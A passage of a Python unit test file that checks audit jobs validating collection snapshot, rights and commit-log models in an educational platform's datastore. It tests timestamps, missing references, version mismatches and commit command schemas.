    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that the time-field relation check fails when
        created_on is later than last_updated.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'CollectionSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that validation fails when last_updated lies in the
        future (mocked datetime runs 13 hours ahead).
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_collection_model_failure(self):
        """Checks that deleting collection '0' makes the collection_ids
        field check fail for both of its snapshot metadata models
        (versions 1 and 2; the deletion itself creates version 2).
        """
        collection_models.CollectionModel.get_by_id('0').delete(
            self.user_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_ids '
                'field check of CollectionSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field collection_ids '
                'having value 0, expect model CollectionModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'collection_ids having value 0, expect model '
                'CollectionModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'CollectionSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_committer_model_failure(self):
        """Checks that deleting the committer's user settings model
        makes the committer_ids field check fail.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of CollectionSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'CollectionSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_invalid_collection_version_in_model_id(self):
        """Checks that a snapshot id whose version (3) exceeds the
        collection's current version (1) fails the version check.
        """
        model_with_invalid_version_in_id = (
            collection_models.CollectionSnapshotMetadataModel(
                id='0-3', committer_id=self.owner_id, commit_type='edit',
                commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for collection model '
                'version check of CollectionSnapshotMetadataModel\', '
                '[u\'Entity id 0-3: Collection model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ), (
                u'[u\'fully-validated CollectionSnapshotMetadataModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
    # NOTE(review): "schmea" in this method name is a typo for "schema".
    def test_model_with_invalid_commit_cmd_schmea(self):
        """Checks that commit commands with missing required attributes
        or extra unknown attributes fail the per-command checks.
        """
        self.model_instance_0.commit_cmds = [{
            'cmd': 'add_collection_node',
        }, {
            'cmd': 'delete_collection_node',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'delete_collection_node check of '
                'CollectionSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'delete_collection_node\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following required attributes are missing: '
                'exploration_id, The following extra attributes '
                'are present: invalid_attribute"]]'
            ), (
                u'[u\'failed validation check for commit cmd '
                'add_collection_node check of '
                'CollectionSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'add_collection_node\'} failed '
                'with error: The following required attributes are '
                'missing: exploration_id"]]'
            ), u'[u\'fully-validated CollectionSnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionSnapshotContentModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the one-off audit job that validates
    CollectionSnapshotContentModel instances.
    """

    def setUp(self):
        """Creates six explorations and three collections owned by the
        same user, then caches the '<id>-1' snapshot content models and
        the job class under test.
        """
        super(CollectionSnapshotContentModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            collection_services.save_new_collection(self.owner_id, collection)
        self.model_instance_0 = (
            collection_models.CollectionSnapshotContentModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            collection_models.CollectionSnapshotContentModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            collection_models.CollectionSnapshotContentModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .CollectionSnapshotContentModelAuditOneOffJob)
    def test_standard_operation(self):
        """Checks that all snapshot content models (including the new
        one produced by a title update) validate fully.
        """
        collection_services.update_collection(
            self.owner_id, '0', [{
                'cmd': 'edit_collection_property',
                'property_name': 'title',
                'new_value': 'New title'
            }], 'Changes.')
        expected_output = [
            u'[u\'fully-validated CollectionSnapshotContentModel\', 4]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that the time-field relation check fails when
        created_on is later than last_updated.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'CollectionSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that validation fails when last_updated lies in the
        future (mocked datetime runs 13 hours ahead).
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_collection_model_failure(self):
        """Checks that deleting collection '0' makes the collection_ids
        field check fail for both of its snapshot content models
        (versions 1 and 2; the deletion itself creates version 2).
        """
        collection_models.CollectionModel.get_by_id('0').delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_ids '
                'field check of CollectionSnapshotContentModel\', '
                '[u"Entity id 0-1: based on field collection_ids '
                'having value 0, expect model CollectionModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'collection_ids having value 0, expect model '
                'CollectionModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'CollectionSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_invalid_collection_version_in_model_id(self):
        """Checks that a snapshot id whose version (3) exceeds the
        collection's current version (1) fails the version check.
        """
        model_with_invalid_version_in_id = (
            collection_models.CollectionSnapshotContentModel(
                id='0-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for collection model '
                'version check of CollectionSnapshotContentModel\', '
                '[u\'Entity id 0-3: Collection model corresponding to '
                'id 0 has a version 1 which is less than '
                'the version 3 in snapshot content model id\']]'
            ), (
                u'[u\'fully-validated CollectionSnapshotContentModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionRightsModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the one-off audit job that validates
    CollectionRightsModel instances.
    """

    def setUp(self):
        """Creates six explorations and three collections, assigns an
        editor on collection '0' and a viewer on collection '2', then
        caches the three CollectionRightsModel instances and the job
        class under test.
        """
        super(CollectionRightsModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.owner = user_services.UserActionsInfo(self.owner_id)
        editor_email = 'user@editor.com'
        viewer_email = 'user@viewer.com'
        self.signup(editor_email, 'editor')
        self.signup(viewer_email, 'viewer')
        self.editor_id = self.get_user_id_from_email(editor_email)
        self.viewer_id = self.get_user_id_from_email(viewer_email)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            collection_services.save_new_collection(self.owner_id, collection)
        rights_manager.assign_role_for_collection(
            self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
        rights_manager.assign_role_for_collection(
            self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
        self.model_instance_0 = (
            collection_models.CollectionRightsModel.get_by_id('0'))
        self.model_instance_1 = (
            collection_models.CollectionRightsModel.get_by_id('1'))
        self.model_instance_2 = (
            collection_models.CollectionRightsModel.get_by_id('2'))
        self.job_class = (
            prod_validation_jobs_one_off.CollectionRightsModelAuditOneOffJob)
    def test_standard_operation(self):
        """Checks that all three rights models validate fully after a
        routine publish.
        """
        rights_manager.publish_collection(self.owner, '0')
        expected_output = [
            u'[u\'fully-validated CollectionRightsModel\', 3]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that the time-field relation check fails when
        created_on is later than last_updated.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(
            feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionRightsModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that validation fails when last_updated lies in the
        future (mocked datetime runs 13 hours ahead).
        """
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionRightsModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    # NOTE(review): the method name appears to be missing "greater" --
    # it checks a first_published_msec value in the future.
    def test_model_with_first_published_datetime_than_current_time(self):
        """Checks that validation fails when first_published_msec is
        greater than the time the job was run (the stored value is
        scaled up by 1e6 to push it into the future).
        """
        rights_manager.publish_collection(self.owner, '0')
        rights_manager.publish_collection(self.owner, '1')
        self.model_instance_0.first_published_msec = (
            self.model_instance_0.first_published_msec * 1000000.0)
        self.model_instance_0.commit(feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for first published msec check '
                'of CollectionRightsModel\', '
                '[u\'Entity id 0: The first_published_msec field has a '
                'value %s which is greater than the time when the job was '
                'run\']]'
            ) % (self.model_instance_0.first_published_msec),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_collection_model_failure(self):
        """Checks that deleting the underlying collection makes the
        collection_ids field check fail.
        """
        collection_models.CollectionModel.get_by_id('0').delete(
            feconf.SYSTEM_COMMITTER_ID, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_ids '
                'field check of CollectionRightsModel\', '
                '[u"Entity id 0: based on field collection_ids having '
                'value 0, expect model CollectionModel with id 0 but '
                'it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_owner_user_model_failure(self):
        """Checks that deleting an owner's user settings model makes the
        owner_user_ids field check fail.
        """
        rights_manager.assign_role_for_collection(
            self.owner, '0', self.user_id, rights_manager.ROLE_OWNER)
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for owner_user_ids '
                'field check of CollectionRightsModel\', '
                '[u"Entity id 0: based on field owner_user_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]') % (self.user_id, self.user_id),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_editor_user_model_failure(self):
        """Checks that deleting the editor's user settings model makes
        the editor_user_ids field check fail.
        """
        user_models.UserSettingsModel.get_by_id(self.editor_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for editor_user_ids '
                'field check of CollectionRightsModel\', '
                '[u"Entity id 0: based on field editor_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.editor_id, self.editor_id),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_viewer_user_model_failure(self):
        """Checks that deleting the viewer's user settings model makes
        the viewer_user_ids field check fail (on collection '2', where
        the viewer role was assigned).
        """
        user_models.UserSettingsModel.get_by_id(self.viewer_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for viewer_user_ids '
                'field check of CollectionRightsModel\', '
                '[u"Entity id 2: based on field viewer_user_ids having '
                'value %s, expect model UserSettingsModel with id %s but '
                'it doesn\'t exist"]]') % (
                    self.viewer_id, self.viewer_id),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_metadata_model_failure(self):
        """Checks that deleting the version-1 rights snapshot metadata
        model makes the snapshot_metadata_ids field check fail.
        """
        collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of CollectionRightsModel\', '
                '[u"Entity id 0: based on field snapshot_metadata_ids having '
                'value 0-1, expect model '
                'CollectionRightsSnapshotMetadataModel '
                'with id 0-1 but it doesn\'t exist"]]'
            ),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_snapshot_content_model_failure(self):
        """Checks that deleting the version-1 rights snapshot content
        model makes the snapshot_content_ids field check fail.
        """
        collection_models.CollectionRightsSnapshotContentModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of CollectionRightsModel\', '
                '[u"Entity id 0: based on field snapshot_content_ids having '
                'value 0-1, expect model CollectionRightsSnapshotContentModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated CollectionRightsModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionRightsSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Unit tests for the one-off audit job that validates
    CollectionRightsSnapshotMetadataModel instances.
    """

    def setUp(self):
        """Creates six explorations and three collections; collection
        '0' is saved by a regular user while the others are saved by
        the owner, so committer-related failures can be exercised on
        '0'. Caches the '<id>-1' rights snapshot metadata models.
        """
        super(CollectionRightsSnapshotMetadataModelValidatorTests, self).setUp(
            )
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            if collection.id != '0':
                collection_services.save_new_collection(
                    self.owner_id, collection)
            else:
                collection_services.save_new_collection(
                    self.user_id, collection)
        self.model_instance_0 = (
            collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            collection_models.CollectionRightsSnapshotMetadataModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .CollectionRightsSnapshotMetadataModelAuditOneOffJob)
    def test_standard_operation(self):
        """Checks that all three rights snapshot metadata models from
        setUp validate fully.
        """
        expected_output = [
            u'[u\'fully-validated CollectionRightsSnapshotMetadataModel\', 3]']
        run_job_and_check_output(self, expected_output)
    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that the time-field relation check fails when
        created_on is later than last_updated.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionRightsSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'CollectionRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that validation fails when last_updated lies in the
        future (mocked datetime runs 13 hours ahead).
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionRightsSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_collection_rights_model_failure(self):
        """Checks that deleting the rights model for collection '0'
        makes the collection_rights_ids field check fail for both of
        its snapshot metadata models (versions 1 and 2; the deletion
        itself creates version 2).
        """
        collection_models.CollectionRightsModel.get_by_id('0').delete(
            self.user_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_rights_ids '
                'field check of CollectionRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field collection_rights_ids '
                'having value 0, expect model CollectionRightsModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'collection_rights_ids having value 0, expect model '
                'CollectionRightsModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'CollectionRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_missing_committer_model_failure(self):
        """Checks that deleting the committer's UserSettingsModel makes the
        audit job report a committer_ids field-check failure.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of CollectionRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'CollectionRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
    def test_invalid_collection_version_in_model_id(self):
        """Checks that a snapshot metadata model whose id encodes version 3
        fails validation when the corresponding CollectionRights model is
        only at version 1.
        """
        model_with_invalid_version_in_id = (
            collection_models.CollectionRightsSnapshotMetadataModel(
                id='0-3', committer_id=self.owner_id, commit_type='edit',
                commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for collection rights model '
                'version check of CollectionRightsSnapshotMetadataModel\', '
                '[u\'Entity id 0-3: CollectionRights model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ), (
                u'[u\'fully-validated '
                'CollectionRightsSnapshotMetadataModel\', 3]')]
        run_job_and_check_output(self, expected_output, sort=True)
    # NOTE(review): 'schmea' in this method name is a typo for 'schema'; the
    # same misspelled name recurs for sibling test classes in this file, so
    # it is left unchanged here for consistency.
    def test_model_with_invalid_commit_cmd_schmea(self):
        """Checks that commit commands with a missing required attribute and
        with an extra unknown attribute each produce a commit-cmd
        domain-validation failure.
        """
        self.model_instance_0.commit_cmds = [{
            'cmd': 'change_collection_status',
            'old_status': rights_manager.ACTIVITY_STATUS_PUBLIC,
        }, {
            'cmd': 'release_ownership',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit cmd '
                'change_collection_status check of '
                'CollectionRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation for '
                'command: {u\'old_status\': u\'public\', '
                'u\'cmd\': u\'change_collection_status\'} failed with error: '
                'The following required attributes are missing: '
                'new_status"]]'
            ), (
                u'[u\'failed validation check for commit cmd '
                'release_ownership check of '
                'CollectionRightsSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'release_ownership\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following extra attributes are present: '
                'invalid_attribute"]]'
            ), (
                u'[u\'fully-validated '
                'CollectionRightsSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionRightsSnapshotContentModelValidatorTests(
        test_utils.GenericTestBase):
    """Unit tests for the CollectionRightsSnapshotContentModel audit job."""

    def setUp(self):
        """Creates 6 explorations and 3 two-node collections (which produce
        rights snapshot content models '0-1', '1-1', '2-1'), and caches those
        models and the audit job class on the test instance.
        """
        super(CollectionRightsSnapshotContentModelValidatorTests, self).setUp(
            )
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            # Collection i contains explorations 2i and 2i + 1.
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            collection_services.save_new_collection(self.owner_id, collection)
        self.model_instance_0 = (
            collection_models.CollectionRightsSnapshotContentModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            collection_models.CollectionRightsSnapshotContentModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            collection_models.CollectionRightsSnapshotContentModel.get_by_id(
                '2-1'))
        self.job_class = (
            prod_validation_jobs_one_off
            .CollectionRightsSnapshotContentModelAuditOneOffJob)

    def test_standard_operation(self):
        """Checks that all three untouched models validate cleanly."""
        expected_output = [
            u'[u\'fully-validated CollectionRightsSnapshotContentModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """Checks that created_on later than last_updated triggers a
        time-field-relation failure for the modified model only.
        """
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of CollectionRightsSnapshotContentModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'CollectionRightsSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """Checks that a mocked (earlier) job-run datetime makes the
        remaining model fail the current-time check.
        """
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'CollectionRightsSnapshotContentModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_collection_model_failure(self):
        """Checks that deleting the referenced CollectionRightsModel yields
        collection_rights_ids field-check failures for both snapshot content
        models that point at it.
        """
        collection_models.CollectionRightsModel.get_by_id('0').delete(
            self.owner_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for collection_rights_ids '
                'field check of CollectionRightsSnapshotContentModel\', '
                '[u"Entity id 0-1: based on field collection_rights_ids '
                'having value 0, expect model CollectionRightsModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'collection_rights_ids having value 0, expect model '
                'CollectionRightsModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'CollectionRightsSnapshotContentModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_collection_version_in_model_id(self):
        """Checks that a snapshot content model id encoding version 3 fails
        validation when the CollectionRights model is only at version 1.
        """
        model_with_invalid_version_in_id = (
            collection_models.CollectionRightsSnapshotContentModel(
                id='0-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for collection rights model '
                'version check of CollectionRightsSnapshotContentModel\', '
                '[u\'Entity id 0-3: CollectionRights model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot content model id\']]'
            ), (
                u'[u\'fully-validated CollectionRightsSnapshotContentModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)
class CollectionCommitLogEntryModelValidatorTests(test_utils.GenericTestBase):
    """Unit tests for the CollectionCommitLogEntryModel audit job."""

    def setUp(self):
        """Creates 6 explorations, 3 two-node collections (which produce
        commit log entries 'collection-0-1' .. 'collection-2-1'), plus a
        hand-built rights commit log entry 'rights-1-1'; caches the models
        and the audit job class.
        """
        super(CollectionCommitLogEntryModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(6)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        collections = [collection_domain.Collection.create_default_collection(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            objective='objective%d' % i,
        ) for i in xrange(3)]
        for index, collection in enumerate(collections):
            # Collection i contains explorations 2i and 2i + 1.
            collection.add_node('%s' % (index * 2))
            collection.add_node('%s' % (index * 2 + 1))
            collection_services.save_new_collection(self.owner_id, collection)
        self.rights_model_instance = (
            collection_models.CollectionCommitLogEntryModel(
                id='rights-1-1', user_id=self.owner_id,
                username=self.OWNER_USERNAME, collection_id='1',
                commit_type='edit', commit_message='', commit_cmds=[],
                post_commit_status=constants.ACTIVITY_STATUS_PUBLIC,
                post_commit_community_owned=False,
                post_commit_is_private=False))
        self.rights_model_instance.put()
        self.model_instance_0 = (
            collection_models.CollectionCommitLogEntryModel.get_by_id(
                'collection-0-1'))
        self.model_instance_1 = (
            collection_models.CollectionCommitLogEntryModel.get_by_id(
